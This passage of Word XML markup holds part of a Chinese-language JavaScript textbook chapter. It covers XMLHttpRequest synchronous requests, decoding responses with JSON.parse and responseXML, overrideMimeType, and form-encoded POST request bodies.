        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将阻塞直到请求完成。在这种情况下，不需要使用事件处理程序：一旦</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>返回，仅需要检查</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>属性。比较例</w:t>
      </w:r>
      <w:r>
        <w:t>18-2</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>getText()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的同步代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>发起同步的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求以获得指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回响应文本，或如果请求不成功或响应不是文本就报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getTextSync(url){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建新请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("GET",url,false);//</w:t>
      </w:r>
      <w:r>
        <w:t>传递</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>实现同步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.send(null);//</w:t>
      </w:r>
      <w:r>
        <w:t>立即发送请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果请求不是</w:t>
      </w:r>
      <w:r>
        <w:t>200 OK</w:t>
      </w:r>
      <w:r>
        <w:t>，就报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if(request.status!==200)throw new </w:t>
      </w:r>
      <w:r>
        <w:t>Error(request.statusText);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果类型错误，就报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var type=request.getResponseHeader("Content-Type");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!type.match(/^text/))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>throw new Error("Expected textual response;got:"+type);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return request.responseText;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同步请求是吸引人的，但应该避免使用它们。客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是单线程的，当</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法阻塞时，</w:t>
      </w:r>
      <w:r>
        <w:t>它通常会导致整个浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>冻结。如果连接的服务器响应慢，那么用户的浏览器将冻结。然而，参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节可接受的使用同步请求的场景。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>响应解码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在前面的示例中，我们假设服务器使用像</w:t>
      </w:r>
      <w:r>
        <w:t>"text/plain"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"text/html"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"text/css"</w:t>
      </w:r>
      <w:r>
        <w:t>这样的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型发送文本响应，然后我们使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>属性得到它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但是还是其他方式来处理服务器的响应。如果服务器发送</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档作为其响应，你能通过</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>属性获得一个解析形式的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档</w:t>
      </w:r>
      <w:r>
        <w:t>。这个属性的值是一个</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，可以使用第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍的技术搜索和遍历它。（</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>草案规范指出浏览器也应该自动解析</w:t>
      </w:r>
      <w:r>
        <w:t>"text/html"</w:t>
      </w:r>
      <w:r>
        <w:t>类型的响应，使它们也能通过</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>属性获取其</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>文档对象，但在写本章时当前浏览器还没有这么做。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果服务器想发送诸如对象或数组这样的结构化数据作为其响应，它应该传输</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码（参见</w:t>
      </w:r>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t>节）的字符串数据。当接收它时，可以把</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>属性传递给</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-3</w:t>
      </w:r>
      <w:r>
        <w:t>是例</w:t>
      </w:r>
      <w:r>
        <w:t>18-2</w:t>
      </w:r>
      <w:r>
        <w:t>的归纳：它实现指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求并当</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容准备就绪时把它们传递给指定的回调函数。但它不是一直传递文本，而是传递</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象或使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>编码的对象或字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-3</w:t>
      </w:r>
      <w:r>
        <w:t>：解析</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>响应以获取指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当响应到达时，把它以解析后的</w:t>
      </w:r>
      <w:r>
        <w:t>XML Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象、解析后的</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>或字符串形式传递给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function get(url,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建新请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:t>.open("GET",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>指定待获取的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onreadystatechange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义事件监听器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果请求完成且成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.readyState===4</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>request.status===200){//</w:t>
      </w:r>
      <w:r>
        <w:t>获得响应的类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var type=request.getResponseHeader("Content-Type");//</w:t>
      </w:r>
      <w:r>
        <w:t>检查类型，这样我们不能在将来得到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(type.indexOf("xml")!==-1</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>request.responseXML)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(request.responseXML);//Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(type==="application/json")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(JSON.parse(request.responseText));//JSON</w:t>
      </w:r>
      <w:r>
        <w:t>响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(request.responseText);//</w:t>
      </w:r>
      <w:r>
        <w:t>字符串响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.send(null);//</w:t>
      </w:r>
      <w:r>
        <w:t>立即发送</w:t>
      </w:r>
      <w:r>
        <w:t>请求</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例</w:t>
      </w:r>
      <w:r>
        <w:t>18-3</w:t>
      </w:r>
      <w:r>
        <w:t>检查该响应的</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头且专门处理</w:t>
      </w:r>
      <w:r>
        <w:t>"application/json"</w:t>
      </w:r>
      <w:r>
        <w:t>影响。你可能希望特殊编码的另一个响应类型是</w:t>
      </w:r>
      <w:r>
        <w:t>"application/javascript"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"text/javascript"</w:t>
      </w:r>
      <w:r>
        <w:t>。你能使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>脚本，然后使用全局</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>4.12.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）执行这个脚本。但是，在这种情况下不需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，因为＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素本身操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>脚本的能力完全可以实现加载并执行脚本。见示例</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>3-4</w:t>
      </w:r>
      <w:r>
        <w:t>，且记住＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素能发起跨域</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求，而</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest API</w:t>
      </w:r>
      <w:r>
        <w:t>则禁止。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务端通常使用二进制数据（例如，图片文件）响应</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求。</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>属性只能用于文本，且它不能妥善处理二进制响应，即使对最终字符串使用了</w:t>
      </w:r>
      <w:r>
        <w:t>charCodeAt()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>定义了处理二进制响应的方法，但在写本章时，浏览器厂商还没有实现它。进一步详情请参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>服务器响应的正常解码是假设服务器为这个响应发送了</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头和正确的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型。例如，如果</w:t>
      </w:r>
      <w:r>
        <w:t>服务器发送</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档但没有设置适当的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型，那么</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象将不会解析它且设置</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。或者，如果服务器在</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头中包含了错误的</w:t>
      </w:r>
      <w:r>
        <w:t>"charset"</w:t>
      </w:r>
      <w:r>
        <w:t>参数，那么</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>将使用错误的编码来解析响应，并且</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>中的字符可能是错的。</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>overrideMimeType()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来解决这个问题，并且大量的浏览器已经实现了它。如果相对于服务器你更了解资源的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型，那么在调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>之前把类型传递给</w:t>
      </w:r>
      <w:r>
        <w:t>ov</w:t>
      </w:r>
      <w:r>
        <w:t>errideMimeType()</w:t>
      </w:r>
      <w:r>
        <w:t>，这将使</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>忽略</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头而使用指定的类型。假设你将下载</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文件，而你计划把它当成纯文本对待。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>setOverrideMimeType()</w:t>
      </w:r>
      <w:r>
        <w:t>让</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>知道它不需要把文件解析成</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不要把响应作为</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.overrideMimeType("text/plain;charset=utf-8")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="454" w:name="18_1_3_Bian_Ma_Qing_Qiu_Zhu_Ti_"/>
      <w:r>
        <w:t>18.1.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　编码请求主体</w:t>
      </w:r>
      <w:bookmarkEnd w:id="454"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求包括一个请求主体，它包含客户</w:t>
      </w:r>
      <w:r>
        <w:t>端传递给服务器的数据。在例</w:t>
      </w:r>
      <w:r>
        <w:t>18-1</w:t>
      </w:r>
      <w:r>
        <w:t>中，请求主体是简单的文本字符串。但是，我们通常使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求发送的都是更复杂的数据。本节演示这样做的一些方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>表单编码的请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>考虑</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单。当用户提交表单时，表单中的数据（每个表单元素的名字和值）编码到一个字符串中并随请求发送。默认情况下，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单通过</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>方法发送给服务器，而编码后的表单数据则用做请求主体。对表单数据使用的编码方案相对简单：对每个表单元素的名字和值执行普通的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>编码（使用十六进制转义码替换特殊字符），使用等号把编码后的名字和值分开，并使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>符号分开名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对。一个简单表单的编码像如下这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>find=pizza</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>zipcode=02134</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>radius=1km</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表单数据编码格式有一个正式的</w:t>
      </w:r>
      <w:r>
        <w:t>MIM</w:t>
      </w:r>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
